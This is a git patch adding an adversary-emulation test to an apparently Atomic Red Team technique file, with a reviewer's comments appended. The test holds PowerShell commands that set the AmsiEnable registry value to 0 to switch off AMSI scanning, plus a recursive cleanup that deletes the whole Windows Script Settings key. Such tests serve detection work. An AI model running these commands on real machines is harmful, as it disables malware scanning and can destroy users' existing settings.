From fbe8663f4955915cfa5adf1a3bfb34dc21bccdef Mon Sep 17 00:00:00 2001
From: NeuralGlitch <107919127+NagaSivaGunturu@users.noreply.github.com>
Date: Thu, 30 May 2024 05:10:55 +0530
Subject: [PATCH] Update T1562.001.yaml (#2788)

Co-authored-by: Carrie Roberts
---
 atomics/T1562.001/T1562.001.yaml | 16 +++++++++++++++-
 1 file changed, 15 insertions(+), 1 deletion(-)

diff --git a/atomics/T1562.001/T1562.001.yaml b/atomics/T1562.001/T1562.001.yaml
index 67f54289..1167b8ca 100644
--- a/atomics/T1562.001/T1562.001.yaml
+++ b/atomics/T1562.001/T1562.001.yaml
@@ -1135,4 +1135,18 @@ atomic_tests:
       Remove-ItemProperty -Path $registryPath -Name $newValueName
       Write-Host "Registry value deleted: $newValueName"
     name: powershell
-  elevation_required: true
\ No newline at end of file
+  elevation_required: true
+- name: AMSI Bypass - Create AMSIEnable Reg Key
+  description: |
+    Threat Actor could disable the AMSI function by adding a registry value name “AmsiEnable” to the registry key “HKCU\Software\Microsoft\Windows Script\Settings\AmsiEnable” and set its value to 0.
+    Ref: https://mostafayahiax.medium.com/hunting-for-amsi-bypassing-methods-9886dda0bf9d
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      New-Item -Path "HKCU:\Software\Microsoft\Windows Script\Settings" -Force | Out-Null
+      New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows Script\Settings" -Name "AmsiEnable" -Value 0 -PropertyType DWORD -Force | Out-Null
+    cleanup_command: |
+      Remove-Item -Path "HKCU:\Software\Microsoft\Windows Script\Settings" -Recurse -Force 2> $null
+    name: powershell
+  elevation_required: true
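Review bot: The cleanup_command in the new atomic deletes the whole `HKCU:\Software\Microsoft\Windows Script\Settings` key with `-Recurse`, but the test only added one value to it, so any pre-existing Windows Script Host settings on the host are destroyed rather than restored; a targeted cleanup would be `Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows Script\Settings" -Name "AmsiEnable" -Force -ErrorAction Ignore`. Both commands write only under HKCU, which a standard user can do, so `elevation_required: true` appears unnecessary and understates the technique — the bypass works without admin rights, and running it elevated is not what a detection should be tuned for. The description says the value disables "the AMSI function" in general and names the path as a "registry key ...\AmsiEnable", whereas AmsiEnable is a value under the `Settings` key and, as far as I know, is honored by the Windows Script Host engine (VBScript/JScript via wscript/cscript), not by PowerShell's AMSI integration; I would state that scope explicitly so testers know which scanning surface to verify, e.g. "Setting the AmsiEnable DWORD to 0 under HKCU\Software\Microsoft\Windows Script\Settings disables AMSI scanning for Windows Script Host engines (VBScript/JScript); it does not affect PowerShell's AMSI integration." The enclosing atomic_tests list continues above the hunk.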